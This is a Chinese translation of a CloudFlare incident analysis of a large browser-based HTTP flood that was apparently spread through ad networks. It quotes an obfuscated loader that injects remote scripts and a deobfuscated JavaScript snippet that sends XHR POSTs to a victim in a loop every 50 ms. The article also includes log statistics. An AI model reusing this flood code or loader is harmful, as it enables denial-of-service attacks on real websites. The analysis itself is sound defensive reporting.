最近一次不寻常的DDoS攻击吸引了我们的眼球,我们注意到有大量的HTTP请求涌向我们的一位客户,攻击并不涉及TCP数据包注入。

分析HTTP请求

以下是其中的一个请求:

POST /js/404.js HTTP/1.1  
Host: www.victim.com  
Connection: keep-alive  
Content-Length: 426  
Origin: http://attacksite.com  
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/42.0.0.0 Mobile Safari/537.36 XiaoMi/MiuiBrowser/2.1.1  
Content-Type: application/x-www-form-urlencoded  
Accept: */*  
Referer: http://attacksite.com/html/part/86.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,en-US;q=0.8
id=datadatadasssssssssssssssssssssssssssssssssssssssssssassssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssadatadata

我们收到上百万相同的请求,这清楚的表明了这是一起DDoS攻击。接下来我们仔细分析下这个请求。

首先,这个请求头看起来是合法的。我们日常工作中经常看到使用Python或者Ruby脚本发起DDoS攻击,其中的Accept-Language和User-Agent就很奇怪,一眼就能看出有问题。但是这个请求看起来又不是这样,从这个请求头信息中看来就是真实浏览器发出的请求。

接下来,注意POST请求以及Origin,有一个Ajax (XHR)交叉起源调用产生的

最后,Referer指向发起请求的服务器页面,该URL正确且能正常访问

基于浏览器的洪水攻击

基于浏览器的L7洪水攻击早前一直是作为一种理论威胁提醒着我们,你可以查看Nick Sullivan的介绍进行进一步了解。

最早是Lavakumar Kuppan2010年提出通过滥用HTML5浏览器特性(PDF)进行DDoS攻击,接着在2013年Jeremiah Grossman 以及Matt Johansen(PDF)提出在恶意JavaScript中将网络广告作为一种分布向量,今年又有一篇论文对此类攻击的成本(PDF)进行了一系列讨论。

最后,今年4月份又有报道称Great Cannon(PDF)采用新方法分发JavaScript——通过将raw TCP段注入经过的连接。就在本周存在漏洞的Imgur图片托管站点就被利用来攻击另一个站点。

综合得出结论,创建JavaScript并非是整个攻击流程中困难的部分,最难的应该是如何有效分发它。在发起大规模洪水攻击中有效的分布向量就显得至关重要,此前我都还没见过大规模的基于浏览器的DDoS攻击。

最令人感到兴奋的是,本次攻击的规模很大,达到了每秒275000个HTTP请求。

攻击页面

根据Referer头信息,我们研究了洪水源。

来自Referer信息中的web页面看起来就像一个链接农场,或者就像是一个广告聚合阅读器。为了方便讨论,我们下面称之为“攻击站点”,该页面是用HTML写的,其中加入了三两个JavaScript。加载了3个JavaScript文件,其中一个名为count.js,其包含了少量我们不易察觉的document.write语句,且有混淆代码:

eval(function(p,a,c,k,e,r){e=String;if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[0-8]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3("<0 4=\\"5://6.anotherattacksite.7/8/1/jquery2.1\\"></0>");2.3("<0 4=\\"5://6.anotherattacksite.7/8/1/jquery1.1\\"></0>");',[],9,'script|js|document|writeln|src|http|www|com|css'.split('|'),0,{}))

将其丢入Js Beautifier,获得结果:

document.writeln("<script src=\"http://www.anotherattacksite.com/css/js/jquery2.js\"></script>");  
document.writeln("<script src=\"http://www.anotherattacksite.com/css/js/jquery1.js\"></script>");

原来jquery2.js也包含一个恶意JavaScript,这并不复杂,请看下面的一个片段:

var t_postdata='id=datadatadasssssssssssssssssssssssssssssssssssssssssssassssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssadatadata';
var t_url8='http://www.victim.com/js/404.js';
function post_send() {  
    var xmlHttp=c_xmlHttp();
    xmlHttp.open("POST",t_url8,true);
    xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlHttp.send(t_postdata);
    r_send();
}
function r_send() {  
    setTimeout("post_send()", 50);
}
if(!+[1,]) { //IE下不执行。  
    var fghj=1;
} else {
    setTimeout("post_send()", 3000);
}

上面的恶意JavaScript,在循环中启用了XHR。

可以看出恶意代码作者使用了一个十分聪明的方法检测IE,之前我们还没有搞懂“if(!+[1,])”是可以用来检测Internet Explorer 9及向上版本的。

日志分析

如图所示,在那天我们收到了来自65万独立IP发起的45亿次请求!

因为这次攻击十分有趣,我们专门写了一个脚本来进一步分析这个17M日志行(大约是总请求的0.4%)

没错这次DDoS来自天朝:

99.8% China  
 0.2% other

我们的系统可以从user agent中提取设备类型,80%的请求来自移动设备:

72% mobile  
23% desktop  
5% tablet

引用的URLs没有一个固定格式,攻击者拥有大量的域名:

27.0% http://www.attacksite1.com  
10.1% http://www.attacksite2.com  
 8.2% http://www.attacksite3.com
 3.7% http://www.attacksite4.com
 1.6% http://www.attacksite5.com
 1.2% http://www.attacksite6.com
 ...

user agents是出了名的难以分析,但是我们还是发现了一些乐子:

Thunder.Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; MI 2S Build/JRO03L) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30  
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143 iThunder  
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0  
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 F1Browser Yunhai Browser  
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.69 Safari/537.36 QQBrowser/9.0.3100.400  
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 2345Explorer/6.1.0.8631  
Mozilla/5.0 (Linux; U; Android 4.4.4; zh-CN; MI 3 Build/KTU84P) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/10.6.2.626 U3/0.8.0 Mobile Safari/534.3

类似"iThunder"字符串的请求可能是来自某个App,另外像"MetaSr", "F1Browser", "QQBrowser", "2345Explorer" 以及"UCBrowser"指向浏览器或者在中国十分受欢迎的浏览器App

矢量分布

这只是确凿证据中的一部分,同时也是我们猜测的开始。目前对于为何会有这么多的移动设备访问到攻击页面,最合理的解释大概就是广告联盟了。看起来似乎就是用户访问的广告服务中包含了恶意JavaScript,这个广告服务存在于移动App的iframes中,或者用户使用浏览器浏览的某些大流量网站中。

从本次攻击的数据包中我们可以确定一件事情,那就是攻击并不涉及TCP数据包注入。

回顾下,我们认为这中间发生了:

1.用户只是随意的浏览网页信息,或者只是在智能手机上打开App应用。
2.用户触发了广告中的iframe
3.广告内容请求来自于一个广告联盟
4.广告联盟转发请求到第三方获取广告盈利
5.要么第三方网站是“攻击页面”或者是第三方网站将用户转发到一个“攻击页面”

这种攻击未来会成为一种新的趋势,其在互联网上呈现出了极大威胁,对于小型网站运营者防御此类攻击绝对是力不从心。

* 参考来源:CloudFlare鸢尾编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

源链接

Hacking more

...